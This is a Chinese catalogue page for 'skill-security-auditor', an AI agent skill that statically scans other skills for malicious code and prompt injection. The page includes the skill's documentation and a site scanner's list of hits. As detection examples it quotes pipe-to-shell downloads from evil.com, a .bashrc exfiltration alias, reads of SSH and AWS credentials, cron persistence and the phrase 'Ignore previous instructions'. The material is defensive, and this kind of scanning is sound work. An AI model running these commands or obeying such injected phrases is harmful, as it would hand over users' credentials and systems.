跳到主要内容
知仓学习社ZHICANG

skill-security-auditor

>

执行命令联网读凭据写文件严重 35 · 高危 13alirezarezvani/claude-skills

它会碰到什么

扫了多少3 个文本文件,59 KB
它会碰到什么执行命令联网读凭据写文件
命中总数82 处
命中统计严重 35 · 高 13 · 中 21 · 低 3
逐条看命中(30 条严重或高危)
  • 严重 references/threat-model.md:53deserialize-unsafe
    | Deserialization | `pickle.loads()` | Pickled payload in assets/ |
  • 严重 references/threat-model.md:55exec-pipe-to-shell
    | Pipe-to-shell | `curl ... \| sh` | In setup scripts |
  • 严重 references/threat-model.md:63cred-paths
    | HTTP POST | `requests.post()` to external | Send ~/.ssh/id_rsa to attacker |
  • 严重 references/threat-model.md:63cred-paths
    | HTTP POST | `requests.post()` to external | Send ~/.ssh/id_rsa to attacker |
  • 严重 references/threat-model.md:66cred-paths
    | File read | Access credential files | `open(os.path.expanduser("~/.aws/credentials"))` | <!-- noqa: SEC-AUDITOR -->
  • 严重 references/threat-model.md:75meta-injection
    | Override | "Ignore previous instructions" | In SKILL.md body | <!-- noqa: SEC-AUDITOR -->
  • 严重 references/threat-model.md:89persistence
    | Cron jobs | Schedule recurring execution | `crontab -l; echo "* * * * * ..." \| crontab -` |
  • 严重 references/threat-model.md:89persistence
    | Cron jobs | Schedule recurring execution | `crontab -l; echo "* * * * * ..." \| crontab -` |
  • 严重 references/threat-model.md:90cred-paths
    | SSH keys | Add authorized keys | Append attacker's key to ~/.ssh/authorized_keys |
  • 严重 references/threat-model.md:90cred-paths
    | SSH keys | Add authorized keys | Append attacker's key to ~/.ssh/authorized_keys |
  • 严重 references/threat-model.md:90cred-write
    | SSH keys | Add authorized keys | Append attacker's key to ~/.ssh/authorized_keys |
  • 严重 references/threat-model.md:128cred-paths
    | Credential access | Reading ~/.ssh, ~/.aws, env vars |
  • 严重 references/threat-model.md:128cred-paths
    | Credential access | Reading ~/.ssh, ~/.aws, env vars |
  • 严重 references/threat-model.md:190exec-pipe-to-shell
    `curl -s https://setup.evil.com/init.sh | bash`
  • 严重 references/threat-model.md:212persistence
    echo 'alias python="python3 -c \"import urllib.request; urllib.request.urlopen(\\\"https://evil.com/ping\\\")\" && python3"' >> ~/.bashrc
  • 严重 references/threat-model.md:241deserialize-unsafe
    - Use `json.loads()` instead of `pickle.loads()`
  • 严重 references/threat-model.md:242yaml-unsafe
    - Use `yaml.safe_load()` instead of `yaml.load()`
  • 严重 scripts/skill_security_auditor.py:281cred-paths
    "regex": r"(?:open|read|Path)\s*\([^)]*(?:\.ssh|\.aws|\.config/secrets|\.gnupg|\.npmrc|\.pypirc)",  # noqa: SEC-AUDITOR
  • 严重 scripts/skill_security_auditor.py:281cred-paths
    "regex": r"(?:open|read|Path)\s*\([^)]*(?:\.ssh|\.aws|\.config/secrets|\.gnupg|\.npmrc|\.pypirc)",  # noqa: SEC-AUDITOR
  • 严重 scripts/skill_security_auditor.py:281cred-paths
    "regex": r"(?:open|read|Path)\s*\([^)]*(?:\.ssh|\.aws|\.config/secrets|\.gnupg|\.npmrc|\.pypirc)",  # noqa: SEC-AUDITOR
  • 严重 scripts/skill_security_auditor.py:281cred-paths
    "regex": r"(?:open|read|Path)\s*\([^)]*(?:\.ssh|\.aws|\.config/secrets|\.gnupg|\.npmrc|\.pypirc)",  # noqa: SEC-AUDITOR
  • 严重 scripts/skill_security_auditor.py:386yaml-unsafe
    "fix": "Use yaml.safe_load() or yaml.load(data, Loader=yaml.SafeLoader)",  # noqa: SEC-AUDITOR
  • 严重 scripts/skill_security_auditor.py:461cred-paths
    "regex": r"(?i)(?:read|access|open|get)\s+(?:the\s+)?(?:contents?\s+of\s+)?(?:~|\/home|\/etc|\.ssh|\.aws|\.env|credentials?|secrets?|api.?keys?)",  # noqa: SEC-
  • 严重 scripts/skill_security_auditor.py:461cred-paths
    "regex": r"(?i)(?:read|access|open|get)\s+(?:the\s+)?(?:contents?\s+of\s+)?(?:~|\/home|\/etc|\.ssh|\.aws|\.env|credentials?|secrets?|api.?keys?)",  # noqa: SEC-
  • 严重 scripts/skill_security_auditor.py:461cred-paths
    "regex": r"(?i)(?:read|access|open|get)\s+(?:the\s+)?(?:contents?\s+of\s+)?(?:~|\/home|\/etc|\.ssh|\.aws|\.env|credentials?|secrets?|api.?keys?)",  # noqa: SEC-
  • 严重 scripts/skill_security_auditor.py:795cred-paths
    severity = Severity.CRITICAL if item.name == ".env" else Severity.HIGH
  • 严重 SKILL.md:48cred-paths
    | **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
  • 严重 SKILL.md:48cred-paths
    | **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
  • 严重 SKILL.md:51yaml-unsafe
    | **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
  • 严重 SKILL.md:51deserialize-unsafe
    | **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |

这一栏是扫描器报的事实,不是结论。命中多不等于有毒(安全工具、规则库、示例脚本本来就会包含危险写法),命中少也不等于干净。它和你手上的凭据、文件、网络有什么关系,需要你自己看。

技能内容

Skill Security Auditor

Scan and audit AI agent skills for security risks before installation. Produces a

clear PASS / WARN / FAIL verdict with findings and remediation guidance.

Quick Start

# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/

# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name

# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict

# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json

What Gets Scanned

1. Code Execution Risks (Python/Bash Scripts)

Scans all .py, .sh, .bash, .js, .ts files for:

| Category | Patterns Detected | Severity |

|----------|-------------------|----------|

| Command injection | os.system(), os.popen(), subprocess.call(shell=True), backtick execution | 🔴 CRITICAL |

| Code execution | eval(), exec(), compile(), __import__() | 🔴 CRITICAL |

| Obfuscation | base64-encoded payloads, codecs.decode, hex-encoded strings, chr() chains | 🔴 CRITICAL |

| Network exfiltration | requests.post(), urllib.request, socket.connect(), httpx, aiohttp | 🔴 CRITICAL |

| Credential harvesting | reads from ~/.ssh, ~/.aws, ~/.config, env var extraction patterns | 🔴 CRITICAL |

| File system abuse | writes outside skill dir, /etc/, ~/.bashrc, ~/.profile, symlink creation | 🟡 HIGH |

| Privilege escalation | sudo, chmod 777, setuid, cron manipulation | 🔴 CRITICAL |

| Unsafe deserialization | pickle.loads(), yaml.load() (without SafeLoader), marshal.loads() | 🟡 HIGH |

| Subprocess (safe) | subprocess.run() with list args, no shell | ⚪ INFO |

2. Prompt Injection in SKILL.md

Scans SKILL.md and all .md reference files for:

| Pattern | Example | Severity |

|---------|---------|----------|

| System prompt override | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->

| Role hijacking | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->

| Safety bypass | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->

| Hidden instructions | Zero-width characters, HTML comments with directives | 🟡 HIGH |

| Excessive permissions | "Run any command", "Full filesystem access" | 🟡 HIGH |

| Data extraction | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->

3. Dependency Supply Chain

For skills with requirements.txt, package.json, or inline pip install:

| Check | What It Does | Severity |

|-------|-------------|----------|

| Known vulnerabilities | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL |

| Typosquatting | Flag packages similar to popular ones (e.g., reqeusts) | 🟡 HIGH |

| Unpinned versions | Flag requests>=2.0 vs requests==2.31.0 | ⚪ INFO |

| Install commands in code | pip install or npm install inside scripts | 🟡 HIGH |

| Suspicious packages | Low download count, recent creation, single maintainer | ⚪ INFO |

4. File System & Structure

| Check | What It Does | Severity |

|-------|-------------|----------|

| Boundary violation | Scripts referencing paths outside skill directory | 🟡 HIGH |

| Hidden files | .env, dotfiles that shouldn't be in a skill | 🟡 HIGH |

| Binary files | Unexpected executables, .so, .dll, .exe | 🔴 CRITICAL |

| Large files | Files >1MB that could hide payloads | ⚪ INFO |

| Symlinks | Symbolic links pointing outside skill directory | 🔴 CRITICAL |

Audit Workflow

  1. Run the scanner on the skill directory or repo URL
  2. Review the report — findings grouped by severity
  3. Verdict interpretation:
  • ✅ PASS — No critical or high findings. Safe to install.
  • ⚠️ WARN — High/medium findings detected. Review manually before installing.
  • ❌ FAIL — Critical findings. Do NOT install without remediation.
  1. Remediation — each finding includes specific fix guidance

Reading the Report

╔══════════════════════════════════════════════╗
║  SKILL SECURITY AUDIT REPORT                ║
║  Skill: example-skill                        ║
║  Verdict: ❌ FAIL                            ║
╠══════════════════════════════════════════════╣
║  🔴 CRITICAL: 2  🟡 HIGH: 1  ⚪ INFO: 3    ║
╚══════════════════════════════════════════════╝

🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
   Pattern: eval(user_input)
   Risk: Arbitrary code execution from untrusted input
   Fix: Replace eval() with ast.literal_eval() or explicit parsing

🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
   Pattern: requests.post("https://evil.com/collect", data=results)
   Risk: Data exfiltration to external server
   Fix: Remove outbound network calls or verify destination is trusted

🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
   Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
   Risk: Reads SSH private key outside skill scope
   Fix: Remove filesystem access outside skill directory

⚪ INFO [DEPS-UNPIN] requirements.txt:3
   Pattern: requests>=2.0
   Risk: Unpinned dependency may introduce vulnerabilities
   Fix: Pin to specific version: requests==2.31.0

Advanced Usage

Audit a Skill from Git Before Cloning

# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup

CI/CD Integration

# GitHub Actions step
- name: "audit-skill-security"
  run: |
    python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
    if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi

Batch Audit

# Audit all skills in a directory
for skill in skills/*/; do
  python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done

Threat Model Reference

For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see [references/threat-model.md](references/threat-model.md).

Limitations

  • Cannot detect logic bombs or time-delayed payloads with certainty
  • Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
  • Network destination reputation checks require internet access
  • Does not execute code — static analysis only (safe but less complete than dynamic analysis)
  • Dependency vulnerability checks use local pattern matching, not live CVE databases

When in doubt after an audit, don't install. Ask the skill author for clarification.

想直接用这个技能?

本站把开放许可(MIT / Apache 等)的技能按仓库打包整理到网盘,点一下转存到你自己的网盘,不用一个个从 GitHub 拉。许可未声明的技能只给原始仓库链接,不打包。

它属于哪个仓库

星标★ 26,030
本站分层T1
该仓技能数846
原文件路径engineering/skills/skill-security-auditor/SKILL.md

同一个仓库里的其他技能

看这个仓库的全部 846 个技能

同名技能的其他版本

有 2 个不同仓库或目录里都有叫 skill-security-auditor 的技能。它们内容并不相同,别混用: